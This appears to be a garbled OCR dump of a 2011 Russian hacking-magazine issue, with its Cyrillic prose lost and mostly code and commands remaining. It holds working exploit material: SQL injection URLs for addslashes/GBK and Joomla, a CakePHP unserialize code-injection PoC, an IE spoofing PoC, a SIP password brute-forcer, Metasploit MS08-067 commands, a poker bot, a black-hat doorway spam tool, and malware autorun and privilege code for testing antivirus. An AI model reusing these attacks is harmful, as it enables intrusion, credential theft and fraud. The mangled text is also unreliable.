String url = request.getURL().toString();
url = url.replace("testphp.vulnweb.com", "www.ya.ru");
httpurl = new HttpUrl(url);
request.setURL(httpurl);
// 2
request.deleteHeader("Proxy-Connection");
request.addHeader("TEstHEadER","0_o");
// 3
response= nextPlugin.fetchResponse(request);
byte[] bytes = response.getContent();
X 05 /148/ 2011
043
: :).
:
, ,
. .
:). , -, ,
- . , - YEHG GoogleHacker (yehg.net/lab/
pr0js/files.php/googlehacker.zip).
. , ,
html , .
.
: PHP- ADDSLASHES SQL-
:
, , SQL-
. OWASPa.
][ , (
).
PHP MySQL
web-. , PHP
MySQL.
- , SQL- .
- . mysql_real_
escape_string ( real), addslashes. ,
, , .
: addslashes (
/) (0x27)
(0x22) , (0x5c) null- (0x00). , .
.
?
SJIS, BIG5, GBK, CP932.
, UTF. -
:
WINDOWS-.
:
win-, .
, ( cmd.exe)
: , nix.
. - ,
doskey. alias . Doskey
/
, .
Windows.
044
, ,
:)
MySQL 4.1.-4.1.20, 5.0.x-5.0.22 PHP < 5.2.5
, ,
, .
, . GBK,
, 0xbf27 ,
. 0xbf5c . addslashes:
, . 0xbf , 0x27
, .
0xbf5c27 (\'), MySQL
0xbf5c 027, - .
SQL- :
http://test.com/Vuln.php?id=%bf%27 OR 1=1 /*
, mysql_escape_string
,
. :
shiflett.org/blog/2006/jan/addslashes-versus-mysql-realescape-string;
ilia.ws/archives/103-mysql_real_escape_string-versusPrepared-Statements.html;
kuza55.blogspot.com/2007/06/mysql-injection-encodingattacks.html;
raz0r.name/vulnerabilities/sql-inekcii-svyazannye-smultibajtovymi-kodirovkami-i-addslashes.
, :
windowsfaq.ru/content/view/203/1,
Microsoft.
1. Doskey /history
2. Doskey ls=dir $*
3. Doskey /exename=ftp.exe go=open 192.168.2.101$tmget *.TXT
c:\reports$bye
:
1. .
2. dir
( $*).
3. ftp.exe. , go
ftp, 192.168.2.101,
. $t (open, mget, bye). ,
X 05 /148/ 2011
,
cmd.exe.
1. :
doskey /macros > stdmacs
"C:\Windows\system32\cmd.exe" 1
nircmd.exe win trans title \
"C:\Windows\system32\cmd.exe" 100
4.
:
2. :
doskey /macrofile=stdmacs
, . : F7/F9,
.
. -
Nirsoft. , , , -
:). Nirsoft nircmdc.
: nirsoft.net/utils/nircmd.html. , (
) .
, 34
, , ,
, , . , , ,
.
- meterpreter, , .
,
. ,
(. ).
1. :
nircmd.exe qboxcom "Do you want to reboot?" \

"question" exitwin reboot
, , .
nircmd.exe
nircmd.exe setsysvolume 65535
2. (. ):
nircmdc.exe trayballoon "Yo man!" "You are powned!" \
"shell32.dll,-15" 10000
3. :
nircmd.exe win settopmost title \
nircmd
: MSCASH-
MSCache2 , Vista:
hash = PBKDF2_SHA( MD4 (MD4(user password) +
lowercase(username)), iterations )
:
, , , ,
. windows-
10 ,
10 .
. ,
,
, . , .
,
. , NTLM-,
SAM LSA, MSCache-.
MSCache. .
Windows 2000-2003:
hash = MD4 ( MD4(user password) + lowercase(user name) )
X 05 /148/ 2011
iterations 10240.
: passcape.com/index.php?se
ction=docsys&cmd=details&id=8.
MSCache, MSCache2 , , , john the ripper jumbo-.
, , .

. ,
, fgdump. ,
, .
, , . .
meterpreter. ,
mediaservice.net .
: lab.mediaservice.net/code/cachedump.rb. z
045

(icq 884888, snipper.ru)

. , advisory ,
PoC-.

,
.
01
PHP
HTTP HEAD-
BRIEF
3
PHP,
HEAD-. HTTP HEAD
method trick in php scripts.
PHP-, ,
,
- ( ). ,
GET, POST, PUT.
, HTTP-
, HEAD. - PHP
.
: ./main/SAPI.c, 315:
if (SG(request_info).request_method &&
!strcmp(SG(request_info).request_method, "HEAD"))
{
SG(request_info).headers_only = 1;
...
- , php_ub_
body_write.
main/output.c, 699:
zend_bailout();
}
,
HEAD zend_bailout .
EXPLOIT
.
, , -
:
<?php
$line='Nick: '.htmlspecialchars
($_POST['nick']).'<br />
Text: '.htmlspecialchars
($_POST['text']).'<hr />';
$f=fopen("book.txt","r");
$data=fread($f,filesize("book.txt"));
fclose($f);
$f=fopen("book.txt","w");
$data=$line.$data;
echo $data;
fwrite($f,$data);
fclose($f);
?>
HEAD:
if (SG(request_info).headers_only) {
if(SG(headers_sent))
{
return 0;
}
php_header(TSRMLS_C);
046
<?php
stream_context_get_default
(array('http'=>array('method'=>"HEAD")));
print_r(get_headers('http://site.com/guestbook.php'));
?>
X 05 /148/ 2011
HEAD-
,
echo $data;, book.txt
- .
.
:
<?php
session_start();
echo 'A long string contains about 4090 characters';
$_SESSION['admin']=1;
if (!isset($_POST['pass']) ||
$_POST['pass']!='somepassword')
{
echo '<b>Wrong or empty password.</b><br>';
$_SESSION['admin_level']=0;
}
advisory HEAD-
PHP
?>

. , ,
.
HEAD, echo,
, . ,
-
4096 ,
'A long string contains about 4090 characters'.
EXPLOIT
PHP <= 5.3.5
SOLUTION
PHP
5.3.5. , ,

HEAD.
02

CAKEPHP
BRIEF
CakePHP ( 7 000 000
) -, PHP .
CakePHP -- (MVC).
X 05 /148/ 2011
Ruby on Rails,
:
;
;
(PEAR::DB, ADOdb
Cake);
(PostgreSQL, MySQL, SQLite, Oracle).
,
.
felix
,
unserialize ( ).
./libs/controller/components/
security.php , XSRF POST-:
<?php
function _validatePost(&$controller)
{
...
$check = $controller->data;
$token = urldecode($check['_Token']['fields']);
if (strpos($token, ':')) {
list($token, $locked) = explode(':', $token, 2);
}
$locked = unserialize(str_rot13($locked));
...
?>
047
CMS, CakePHP

.
,
__load App:
CakePHP
$check POST-,
$locked str_rot13()
,
.
,
][, , PHP.
, PHP 5 : . __construct,
__destruct.
unserialize() __
destruct-, .
PHP, - unserialize (
advisory suspekt.org/downloads/
POC2009-ShockingNewsInPHPExploitation.pdf).

App- ./libs/configure.php:
function __destruct()
{
if ($this->__cache)
{
$core = App::core('cake');
unset($this->__paths[rtrim($core[0], DS)]);
Cache::write('dir_map', array_filter($this->__paths),
'_cake_core_');
Cache::write('file_map', array_filter($this->__map),
'_cake_core_');
Cache::write('object_map', $this->__objects,
'_cake_core_');
}
}
,

Cache.
file_map. PHP-,
048
<?php
...
if (file_exists($file)) {
if (!$this->return) {
require($file);
$this->__loaded[$file] = true;
}
return true;
...
?>
! $file
PHP-!
Remote File Inclusion ,
. LFI- , CakePHP
,

.
EXPLOIT
PoC
felix :
<?php
$x=new App();
$x->__cache=1;
$x->__map=array("Core" => array(
"Router" => "../tmp/cache/persistent/cake_core_file_map"),
"Foo" => "<? phpinfo(); exit(); ?>");
$x->__paths=array();
$x->__objects=array();
echo serialize($x);
?>
, CakePHP.
,
malloc.im/burnedcake.py.
,
CakePHP, POST- security-,
. ,
PHP-.
X 05 /148/ 2011
security- Joomla! 1.6.1

SQL-
Joomla!
' FROM #__weblinks' .

' WHERE catid = '. (int) $this->_id.
' AND published = 1' .
' AND archived = 0'.
' ORDER BY '. $filter_order .''.
$filter_order_dir .', ordering';
TARGETS
CakePHP <= 1.3.5, CakePHP <= 1.2.8
SOLUTION

CakePHP
cakephp.org.
03
SQL-
JOOMLA!
BRIEF
,
PHP JavaScript
MySQL. ,
GNU GPL.
Joomla!,
- :).
SQL-
, .
, YGN Ethical
Hacker Group (yehg.net/lab) 1.5.21.
, SQL- Joomla! 1.5.20 XSS.
,
1.5.21.
, YEHG
, , Joomla!
.

SQL- ,
, , .
, ./components/com_weblinks/models/category.
php :
function _buildQuery()
{
$filter_order = $this->getState('filter_order');
$filter_order_dir = $this->getState('filter_order_dir');
$filter_order = JFilterInput::clean($filter_order, 'cmd');
$filter_order_dir =
JFilterInput::clean($filter_order_dir, 'word');
// We need to get a list of all
// weblinks in the given category
$query = 'SELECT *' .
X 05 /148/ 2011
return $query;
}
, $filter_order $filter_order_dir SQL,

clean
JFilterInput:
<?php
...
case 'WORD' :
$result = (string) preg_replace ( '/[Â-Z_]/i', '', $source );
break;
...
case 'CMD' :
$result = (string)
preg_replace( '/[Â-Z0-9_\.-]/i', '', $source );
$result = ltrim($result, '.');
break;
...
, .
1.6.
EXPLOIT

Joomla! <= 1.5.21:
/index.php?option=com_weblinks&view=category&id=2&filter
_order_Dir=&filter_order=%00'
/index.php?option=com_weblinks&view=category&id=2&filter
_order_Dir='&filter_order=asc
Joomla! 1.6.0:
attacker.in/joomla160/index.php/using-joomla/extensions/
components/content-component/article-category-list/?filter_
order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,&filter_order_
Dir=2&limit=3&limitstart=4
attacker.in/joomla160/index.php/using-joomla/extensions/
components/content-component/article-category-list/?filter_
order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBB,&limit=3&limit
start=4
049
bing.com
:
JFilterInput::clean filter_order_Dir filter_order,

.
, -
,
.
TARGETS
Joomla! <= 1.5.21, Joomla! 1.6.0
SOLUTION
, joomla.org.
CMS 1.5.22 1.6.0 .
04

MICROSOFT INTERNET EXPLORER
BRIEF

IE, cyber flash.

-.
-
.
-
.
EXPLOIT

PoC HTML-:
<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1252">
<meta http-equiv="REFRESH" content="10;url=http://www.
keyloggeronline.com/index.php">
<title>Spoof</title>
<script>
function myOpen() {
var mywin=open("about:blank", "mywindow",
"location=1,scrollbars=0,width=300,height=290");
050
IE
mywin.location.href="http://www.keyloggeronline.com/misc/
temp/a.php?http://www.bing.com/" + Array(5).join(" ") + " ";
self.blur();
}
</script>
</head>
<body onclick="myOpen();">
Click anywhere on this page!
</body>
</html>
cyber flash
PoC- keyloggeronline.com/misc/temp/about.htm.
, , bing.com. ,
,
. ,
Internet Explorer (, Download,
,
, - ).
, .
TARGETS
MS Internet Explorer 7, 8, 9
SOLUTION

, , IE,

. z
X 05 /148/ 2011

Dot.err (kaifoflife@bk.ru)
,
,
!
partypoker.com
- .
, . , .
, , -
,
- .
- ,
. ,
, .
. ,
,
partypoker.com :).
052
Flop aka
, .
//etc. ,

.
, . ,
.
-. X 05 /148/ 2011

.
, :).
Turn
, :
1.
partypoker.com.
2. -.
3.
.
4. .
,
,
.
.
12801024,
,
,
.
, , ,
. ,
, .
, ,
.

Unit3.cpp.
....

TABLE, :
TABLE table1;
...
Tricks & Tips:

-:
table1.position = "1";
...
table1.last_cards = "start";
...
X 05 /148/ 2011
dvd

,
:)
table1.position = Form1->Edit1->Text.c_str();
...
.
. ,

.
P4 2800MHZ, 1 .
while(true) {
Sleep(2000);

:
check_situation(table1.situation, table2.situation,
table3.situation, table4.situation);
Form1->Label34->Caption = table1.situation.c_str();
, , .
.
,
. ,
:
if (table_1_start == "go") {
1.
, .
,
. ,
aka
, .
, ,
.
2.

, .

,
,
.
3. ,
-. ,
,
,
:).
4. , -
,
.
5. .
, :).
DVD

- , :
if (table1.situation=="check" ||
table1.situation == "call_0.10" ||
table1.situation=="call_0.05" ||
table1.situation=="call_many" ||
table1.situation=="allin") {
WARNING
warning
!

.
,

.
INFO
info
, -

,

!
,
-

,
.
table1.combination = "--";
table1.action = "--";

:
check_p_cards( 1, table1.p_card_1, table1.p_card_2);
Form1->Label26->Caption = table1.p_card_1.c_str();
Form1->Label27->Caption = table1.p_card_2.c_str();
check_t_cards( 1,table1.t_card_1,table1.t_card_2,
table1.t_card_3,table1.t_card_4,table1.t_card_5);
Form1->Label11->Caption = table1.t_card_1.c_str();
053

( /
/etc):
check_position(1, table1);
Form1->Label62->Caption = table1.position.c_str();

.
- :
shortstack(1, table1);
table1.action:
Form1->Label38->Caption = table1.action.c_str();
Form1->Label58->Caption = table1.combination.c_str();
, . :
mouse_click(1, table1);
, ,
, .
:
write_stat(1, table1);
, , .
table1.last_cards = table1.p_card_1 + table1.p_card_2;
.
. . outfile_name
, . startX
startY height width.
void PRINT_RECT_SVV (char* outfile_name,
int startX, int startY, int width, int height)
// GetDC
054
// . 0 -
{
HDC hdc = GetDC(0);
if (hdc) //
{
Graphics::TBitmap* bmp = new Graphics::TBitmap();
__try {
bmp->Width = width;
bmp->Height = height;
// p p hdc bmp,
// pp , SRCCOPY
BitBlt(bmp->Canvas->Handle, 0, 0, width, height,
hdc, startX, startY, SRCCOPY);
bmp->SaveToFile(outfile_name);
// BMP
}
__finally {
delete bmp; //
}
}
}
,
, : ?
,
.
MD5- ,
, .
MD5-
, :
bool CHECK_MD5_SVV (char* ET_fi le, char* newfile) {
md5wrapper md5;
//
std::string hash1 = md5.getHashFromFile(newfile);
// ,
std::string hash2 = md5.getHashFromFile(ET_fi le);
//
if (hash1==hash2) return true;
else return false;
}
.
:
void check_this_card (char* new_path, string &card) {
// A
if (CHECK_MD5_SVV(".\\ET\\ET_A_p.bmp", new_path))
{card = "Ap"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_k.bmp", new_path))
{card = "Ak"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_ch.bmp", new_path))
{card = "Ach"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_b.bmp", new_path))
{card = "Ab"; }
//
...
else { card = "--"; }
}
( , ) X 05 /148/ 2011
.
, :
void check_p_cards(int table, string &card1, string &card2) {
if (table==1) {
//
PRINT_RECT_SVV(".\\ET\\ch_card1_t1.bmp", 37,150,12,22);
//
PRINT_RECT_SVV(".\\ET\\ch_card2_t1.bmp", 55,150,12,22);
//
check_this_card(".\\ET\\ch_card1_t1.bmp", card1);
//
check_this_card(".\\ET\\ch_card2_t1.bmp", card2);
}
if (table==2) {
...
}
void check_t_cards (int table, string &card1, string &card2,
string &card3, string &card4, string &card5) {
if (table==1) {
PRINT_RECT_SVV(".\\ET\\t1c1.bmp",198,154,12,22);
//
check_this_card(".\\ET\\t1c1.bmp", card1);
}
if (table==2) {
...
}
.
, , , :
bool is_a_table (int table_number) {
if (table_number==1) {
PRINT_RECT_SVV(".\\ET\\is_a_table_1.bmp",5,5,95,25);
if (CHECK_MD5_SVV(".\\ET\\ET_is_table.bmp",
".\\ET\\is_a_table_1.bmp")) return true;
else return false;
}
if (table_number==2) {
...
,
. , -, , .
void mouse_click (int table_number, TABLE &this_table) {
...
if (this_table.action == "fold") {
SetCursorPos(x+380, y+410);
mouse_event(MOUSEEVENTF_LEFTDOWN, x+380, y+410,0,0);
Sleep(100);
mouse_event(MOUSEEVENTF_LEFTUP, x+380, y+410, 0, 0);
}
...
}
056
,
TABLE.
,
. , .
: mov ah,86h; mov dx,cx; int 15h.
! , !
,
:).
, .
, , (shortstack). (
, ),
( ).
// ,
if (this_table.t_card_1 == "--") {
// :
if (card_rank(this_table.p_card_1)==
card_rank(this_table.p_card_2)) {
// -
// -
if ((this_table.situation == "call_many")
||(this_table.situation == "allin")) {
//
// , - (all in)
if ((card_rank(this_table.p_card_1)>=9)
&& (this_table.trade_cycle>=2))
{this_table.action = "allin";}
//
//
// all-in
else if (card_rank(this_table.p_card_1)>=10)
{ this_table.action = "allin"; }
else { this_table.action = "fold"; }
//
// ( )
} else if ((this_table.situation == "check")
||(this_table.situation == "call_0.05")||
(this_table.situation == "call_0.10")) {
//
// ( )
...
, . , , .
.
.
,
.
, :).
River: all-in
,
: PartyPoker .
( -!)
- , .
: .
,
.
, . z
X 05 /148/ 2011
Total DVD

!

!
!u
vd.r
totald

()
CLIENT-SIDE

2004 , ?
2004
, client-side (
, )
2004 ,
.
Flash
Firefox
HTML
Java
Internet
Explorer
58
058
X 05 /148/ 2011
2011
, ,

. Flash

.

.

.

,
. ,
Adobe

,
.

. client-side
,
, .

, ,
Google
Chrome
ASLR
DEP
ASLR
DEP

,
. ,

(DEP, ASLR,
SEHOP).

, , .
,

ESET

Sandbox
Flash
IE 8
HTML
IE 7
ASLR
Firefox
ASLR
Kernel
DEP
Java
IE 6
X 05 /148/ 2011
59
059

Aggressor

VoIP!
VoIP-

IP- . , .

, , .

.
sipvicious, .
, svmap.py (
), VoIP-, : Cisco, AddPac,
Linksys . , web. , , , , . :). Linksys
web-. ,
.
060
. , VoIP SPA-841. IP-, , . , ,

, ,
, VoIP- .
Cisco-500 VoicePhone Text Logo.
. , from Russia with Love
VoIP- :). ,
IP ( web - ),
. ,
X 05 /148/ 2011

, .
-,
. ,
... ,
. . ? web, ,
, , username
auth id ( ), .
, , .
, -.
403 ( ),
.
SIP-
, SIP-.
Softswitch (,
Asterisk) REGISTER, ,
contact. 401
Unauthorized, ,
Digest access authentication. nonce realm. nonce
realm ( ), username
( ), digesturi,
md5- response
Softswitch,
. , 200 ,
401. , , , ,
.
, peer,
username, , .
.
/etc/sip.conf
[peru]
type=friend
username=*username *
secret=helloworld
host=dynamic
disallow=all
allow=alaw
allow=ulaw
tshark 5060 : tshark

port 5060 -w /tmp/001.pcap. , ,
Proxy IP-
X 05 /148/ 2011
Wireshark
Submit all Changes. 10 ,
2 ,
INFO
, - . ,
tshark'e ,
info
.
Proxy .
,

Google.
(,

Wireshark). REGISTER response
intitle: Sipura
,
SPA Configuration,
. ,

,
,
CLI sip set debug on .
, ,
.
, , .
.
, goo.gl/Ravuu,

( ,
). ,
.
#!/usr/bin/python
import md5 # ,
md5-
#
EN = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
#
en = "abcdefghijklmnopqrstuvwxyz"
digits = "1234567890"
space = " "
p = ",.-!?;:'\"/()"
op = "+-*/:^()><="
all_spec = "'~!@#$%^&*-_=+\\|/?.>,>'\";:[]{}"
class ABCIterator:
# ... , :)
# ...
# ,
u=(raw_input('username >> '));
b=(raw_input('realm >> '));
m=(raw_input('method >> '));
061
SIP-
d = (raw_input('digestURI >> '));
r = (raw_input('response >> '));
n = (raw_input('nonce >> '));
print u,b,m,d,r,n;
ha2= md5.new(m+":"+d).hexdigest();
# ha2
response=0;
ch=0; #
#
for i in ABCIterator(start_len=1, stop_len=8, abc=digits+en):
# , 1,
# 8, #
#
ch = ch+1;
if ch % 500000 == 0: print i;
# 500000-
#
ha1 = md5.new(u+":"+b+":"+i).hexdigest();
response = md5.new(ha1+":"+n+":"+ha2).hexdigest(); #
if r == response: #
print "------------------>", i;
# ,
exit(0);
, ,
, . :).
, . ,
Proxy, username.
,
realm asterisk, digesturi . ,
REGISTER
401 nonce.
,
( ).
realm, digesturi, username,
REGISTER, nonce
-response,
response . 401 nonce
( sipp). ,

,
:). REGISTER sipp,
:
C sipp nonce.xml
<?xml version="1.0" encoding="ISO-8859-1" ?>
<scenario name="register">
062
sipp
<recv request="REGISTER"/>
<send>
<![CDATA[
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP [local_ip]:5060;
branch=[branch];received=[remote_ip]
From: *username *
<sip:*username *@*ip c Asterisk*>
To: *username *
<sip:*username *@*ip c Asterisk*>
Call-ID: [call_id]
CSeq: [cseq] REGISTER
Server: Asterisk PBX 1.6.2.13
Allow: INVITE, ACK, CANCEL,
OPTIONS, BYE, REFER, SUBSCRIBE,
NOTIFY, INFO
Supported: replaces, timer
WWW-Authenticate: Digest algorithm=MD5,
realm="asterisk", nonce="17852b0a"
Content-Length: [len]
]]>
</send>
</scenario>
<recv request=REGISTER/> sipp

.
,
,
sipp:
sipp -sf nonce.xml *ip * -i *ip c Asterisk* -trace_msg \
-l 10 -r 1 -rp 1000
tshark
. , .
, ,
.
, ,
( ), :). z
X 05 /148/ 2011
11
VOIP
VoIP- . ,
. ,
.
,
VoIP . . IP-
extension', . ,
,
. 11 . ?!
,
. ,
, , , . 23 500 ( 315 000
) ,
( ).
. . ,
,
Shadow Communication Company Ltd.
.
SIP-?
VoIP
PBX (private branch exchange) , - , .
,

SIPVicious (sipvicious.org), Python' . , ,
.
1. ( 192.168.1.1/24),
BPX.
[you@box sipvicious]$ ./svmap 192.168.1.1/24
| SIP Device
| User Agent
|
--------------------------------------------| 192.168.1.103:5060 | Asterisk PBX
|
( , ,

),
. ,
,
, , .
,
VoIP. Shadow
Communication Company 1 541 187 11 094 167 .
: , VoIP-.
42 .
VoIP-

| 100
| 101
| reqauth
| noauth
|
|
, . , 101 . 100 123 .

3. , (
):
[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 100
| Extension | Password |
-----------------------| 100
| 100
|
extention 100 !
4. :
, IP- 192.168.1.103,
Asterisk PBX.
2. extention' ( , ) .
.
[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 \

-d dictionary.txt
| Extension | Password |
-----------------------| 123
| secret |
123!
[you@box sipvicious]$ ./svwar.py 192.168.1.103
| Extension | Authentication |
-----------------------------| 123
| reqauth
|
X 05 /148/ 2011
,
. -
SIP- (, X-Lite) .
063

M4g (icq 884888, snipper.ru)
red.Button
, SEO.
,
.
SEO,
.
.
?
, - :).
.
.
,
- . ,
,
064
,
- .
? :
,
, ,
.
:
,
.
X 05 /148/ 2011

: .
-
- ( )
, , ,

SEO .

, .

red.Button.

- SEO.
, :

,
, ,
,

,
..
, :
1. .
PPS (Pay Per Sale), (, ,
, , , ), PPC (Pay
Per Click) , PPL (Pay Per Lead)
.

.
, - .
,
.
SEO-.
2.
,

.
,
() .
3. .

.
, X 05 /148/ 2011
, red.Button

.
4. , ,
. ,
, .

,
, KeyWordKeeper.
5. .
6. - SEO . ,
(, ,
), , , ,
.
, , :

(, -
, , ,
);
;

AddUrl ( ).
7.
. , ,
: Site-Auditor,
ControlDoors .
8.
:).
, , .
, .
DVD
dvd

:
: ,
.;
2.3: ;
Magadan Lite: ,
2;
KeyWordKeeper 4.2.4:
;
ControlDoors: ;
Site Auditor:
,
2;
Red.Button
TRANSFORMER:
.
.?
, , .
.
, red.Button ,
2003 .
( Forum Generator),
,
. ,
2008 , -
065

, ,
. .
red.Button
.
Red.Button TRANSFORMER, .
. PHP 4-5 safe_mode.
:
;
;
FTP;
;
( );
(,
iframe, ajax),
, (c

);
;
;
;
(CP) ( child
porn);
html-, xml- rss-;
, BB-, HTML+BB,
SpamIT Vista VIP;
;

( );
;

;
,
;
;
;
;
;
, , ;
.
066

WAMP- Denwer.
C:\WebServers\home\
localhost\www http://
localhost.

admin/admin .
.
, : , , , .
:
1. :
: ;
: ;
;
X (
, , ,
1000 ( ,
);
: ;

( );
: , doorway1 (
);
URL / : (, http://doorway.com/doorway);
, , .
, SEO-,
, .
.
2. :
: ( );
: ;
: super_pack_theme (
C:\WebServers\home\localhost\www\yes\
shabs);
: 2-3 ,
2-3 ;
: 1 3%;
X 05 /148/ 2011

CP: ;
: 2 4;
: ;
: JS (!);
: ;
: ,
;
: 5 ;
: 3 7%;
: (map.html), RSS,
sitemap.xml, robots.txt.

. .
.
3. :
: ,
;
: ,
,
;
: ;
: ;
: ,
META Description , ,
, .

!!! ,
.
C:\WebServers\
home\localhost\www, doorway1
http://doorway.com/doorway ( ,
).
? :) ..
, ,
.
X 05 /148/ 2011
, -, ,
, .
-, ,
,
. HTML , .
( ).

, .
, , .
, -: Google PR, (
edu gov), Alexa Rank.

. SEO- .
( , )
.
.
. -

, - , .
SEO! z
067

(alumni.samara@gmail.com)
60

Windows
, Windows .
.
Windows ?
. !

Windows Metasploit Framework MS08-067. -

,
Facebook (facebook.com/#!/
group.php?gid=73074814856), , MSF (vk.com/club16499787),
. ,
068
Windows XP Professional SP2 SP3

( , ,
kb.cert.org/vuls/id/827267). ,
.
Metasploit Framework
metasploit.com ( ).
.
Metasploit Framework
, X 05 /148/ 2011
History
23 2008 Microsoft MS08-067. ,
(958644).

Windows. ,
MS08-067
. , ,
Conficker/Downadup .
Microsoft $250 000 , . !,
. ,
.
Windows nmap,
Metasploit Framework. , nmap, 445, . , ,
? ,
IP- , bgp.he.net Prefixes IP v4.
nmap,
, my_isp.txt,
nmap. , ,
:
nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txt
,
, ,
, 2008

... , nmap .
shell:
meterpreter
,
Meterpreter () Windows,
. MP, PHP JAVA. ,
X 05 /148/ 2011
OS Fingerprints . :)
, TCL-
shell- Cisco IOS tclpro.exe .
? :).
MP
Windows-, Metasploit Framework,
:
.
1. bind_meterpreter
.
Meterpretera , .
2. reverse_meterpreter

Meterpretera.
. , IP- (
NAT).
3. find_tag , , Meterpretera
,
. ,
, .
4. bind_tcp cmd.
exe, , ,
Meterpreterà.
.
.
? ,
nmap, . .
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit> set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
, (cmd.exe) ,
, . ,
msf Windows 7,
069
FrameWork
64- , ( GUI),
.
( ).
.
. , !
, nmap, IP-
Windows 2003 Server
( , , !).
(exploit/windows/smb/ ms08_067_
netapi) bind_meterpreter. Meterpreter, token_adduser,
SYSTEM use priv. ,
,
. -, FTP -
- exploit, Metasploit
, :
.
, .
, Windows,
445
. ,
,
. , ,
, .
, Windows,
. :). z
070
X 05 /148/ 2011

(icq 884888, snipper.ru)
X-TOOLS
: File Uploader
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Napster

multi-up.com

(, , ).
-

. File Uploader
Napster.

:
4shared.com ( );
d.lsass.us;
depositfiles.com ( );
dump.ru ( );
fileshare.in.ua;
filetrash.ru;
ifolder.ru;
letitbit.net ( );
megaupload.com ( );
multi-up.com;
openfile.ru ( );
rapidshare.com ( );
rapidshare.de ( );
rapidshare.ru ( );
rghost.ru;
sendfile.su;
sendspace.com ( );
slil.ru;
uploadbox.com ( );
uploading.com ( );
yandex.ru ( ).
:
;
072
;
;
;
(RU/EN);
login/pass
;
;
Drag&Drop;
,
;
;
;
.

: blog.napster2k.tk.
: PHPFastScanner
: *nix/win
: Dr.Z3r0
Reverse-IP

- Reverse-IP
.
. !

PHPFastScanner Reverse-IP
PHP.

Reverse-IP.
:

Reverse-IP ( bing.com);

( 68 );

;
phpinfo, phpmyadmin, sypex dumper;
,
;

;
;
HEAD
( ,
);

;

(
);
Keep-Alive ( );
(
);
, , FAQ.

.
,
. ()
. PHPFastScanner
,

-.
,

][. Dr.Z3r0.
, :
1
- 1 ;
2
- 2 ;
3
- 10 ;
13 . 10
. ,

.
RDot: goo.gl/GaIrD.
X 05 /148/ 2011
: Free Mail
: Zdez Bil Ya
).
- ,

: goo.gl/tfSXF.
: QTss-Brute
: RankoR

(
)

. Free Mail
e-mail
.
:
Mail.ru (mail.ru, bk.ru, list.ru,
inbox.ru);
Rambler.ru;
Atlas.cz (atlas.cz, mujmail.cz);
Centrum.cz;
Bigmir.net;
Km.ru (km.ru, freemail.ru, bossmail.ru,
girlmail.ru, boymail.ru, megabox.ru,
safebox .ru);
Online.ua;
Meta.ua;
Xakep.ru;
I.ua (i.ua, fm.ua, email.ua, 3g.ua);
Yahoo.com;
Pochta.ru (qip.ru, pochta.ru,
hotmail.ru, fromru.com, front.ru,
hotbox.ru, krovatka.su, land.ru,
mail15.com, mail333.com, newmail.ru,
nightmail.ru, nm.ru, pisem.net,
pochtamt.ru, pop3.ru, rbcmail.ru,
smtp.ru).
:

;

;

(
), good.txt;

(
mail.ru);
.
, ,

(,
X 05 /148/ 2011
.
0 , good.txt
.
, .

CheckBox:
1. Code 0: , 0 , .
2. Skip Code Zero: ,
0,

.
!
,
, QTss-Brute, goo.gl/Q8Ujx.
: DValid Checker
: Zimper

, QTss
.
? ,
ActiveX- MS TS AX
Control, metala -
//. ,
Windows
.
:
1. GUI- . C++ Qt.
2. C WinSocke.
- C++ (Qt) C.
:
RDP
5 (
);

IP
3389;
;

, ;
;
10 ;
;

;
- .
,
,
0 (
),

DValid Checker Zimper.
:

;
good
.txt, bad.txt, unknown.txt;
;
6 ;
2 : ( .txt ,
);
;
;
;
.NET Framework.

:
1. Unknown ,
(
);
2. :
Windows XP ;
;
.
: noxzim.com/?p=415. z
073
MALWARE

free- Avast, Avira, AVG,

Comodo, ClamAV

.
(
) .
, . ? :
, ,
:
. ,
,
074
.
,
, ,
, .
, , ,
.
X 05 /148/ 2011
, - !
. AV- Avast, Avira, AVG, Comodo,
ClamAV.
.
Monitor Program Start.

ClamAV, . ,
Free (Cloud + AV), Trial,
.
3.0.0.18.
Avira AntiVir Personal
Comodo Antivirus Free
: Avira AntiVir Personal

Free Antivirus. 9.0.0.13.
, , ,
AntiVir Guard. , , . ,
,
,
.
Comodo Antivirus
Free, 5.3.181415.1237. Comodo,
,
. Defense+,
.
, Paranoid Mode, , ,
Safe Mode.
:
, ( )
.
.
avast! FREE Antivirus

avast! FREE Antivirus, 110319-1.
, ,
. , (
, ), , .
AVG Anti-Virus Free Edition

, a
AVG. AVG Anti-Virus Free Edition, 10.0.1204.
.
, Resident
Shield, Anti-Rootkit, Anti-Virus Identity Protection.
ClamAV
Immunitet 3.0 ClamAV .
radiobutton
.
X 05 /148/ 2011
, . ,
Windows
hklm\software\windows\currentversion\run. :
wchar_t szFullPath[MAX_PATH] = {0};
GetModuleFileNameW(0, szFullPath, MAX_PATH);
HKEY hKey = 0;
RegOpenKeyW(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\
Windows\\CurrentVersion\\Run", &hKey);
075
MALWARE
Avira
Avast
AVG
+-
ClamAV
Comodo

UINT ExitCode = RegSetKeyValueW(hKey, 0, L"MalwareAutorun",
REG_SZ, szFullPath, lstrlenW(szFullPath) + 1);

.

. ? ,
: Avast Comodo ,
.
, ,
Token ( ).
,
. :
HANDLE hToken = 0;
UINT nReturnCode = 0;
LUID UID = {0};
TOKEN_PRIVILEGES TokenPrivileges = {0};
nReturnCode = OpenProcessToken(GetCurrentProcess(),
TOKEN_ALL_ACCESS, &hToken);
nReturnCode = LookupPrivilegeValueW(0, SE_DEBUG_NAME, &UID);
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Luid = UID;
TokenPrivileges.Privileges[0].Attributes = 0;
nReturnCode = AdjustTokenPrivileges(hToken, false,
&TokenPrivileges, 0, 0, 0);
